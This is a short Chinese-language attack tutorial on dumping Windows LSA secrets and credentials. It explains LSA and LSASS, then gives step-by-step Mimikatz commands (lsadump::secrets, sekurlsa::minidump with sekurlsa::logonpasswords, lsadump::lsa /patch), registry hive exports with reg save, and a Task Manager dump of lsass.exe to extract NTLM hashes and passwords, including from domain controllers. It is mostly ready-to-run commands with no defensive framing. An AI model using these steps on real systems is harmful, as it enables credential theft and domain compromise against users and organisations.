LSA转储

LSA是本地安全机构(Local Security Authority)的缩写,它是Windows操作系统中负责验证用户身份和强制本地安全策略的核心组件。LSA包含本地安全机构服务器服务(LSASS)进程,它管理着微软账号和Azure相关的密码和令牌等必要的系统凭证

模拟令牌转储

在Mimikatz中执行以下命令即可转储LSA:

privilege::debug
token::elevate
lsadump::secrets

注册表转储

首先在cmd中输入以下命令以转储注册表:

reg save HKLM\SYSTEM system
reg save HKLM\security security

接着在Mimikatz中输入以下命令即可提取HASH:

 privilege::debug
 lsadump::secrets /system:c:\Users\snowwolf\Desktop\system /security:c:\Users\snowwolf\Desktop\security

任务管理器

在Windows主机中打开任务管理器查找lsass.exe进程并右键创建转储文件即可:

现在启动Mimikatz并输入以下命令即可提取HASH:

privilege::debug
sekurlsa::minidump C:\Users\snowwolf\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

在Windows 10 和 Windows 11 版本,该进程更改为如下图所示:

Patch参数

lsadump::lsa /patch命令是专用于在域控制器上导出用户密码或哈希的命令,它可以绕过LSA保护,直接从内存中读取NTDS.DIT文件的内容。

在Mimikatz中执行以下命令即可提取:

privilege::debug
lsadump::lsa /patch

我们可以看到域名、SysKey、本地SID、SAMKey等信息,以及每个用户的RID、用户名和NTLM哈希值

当然,还有其它方法提取,比如转储Lsass且不使用Mimikatz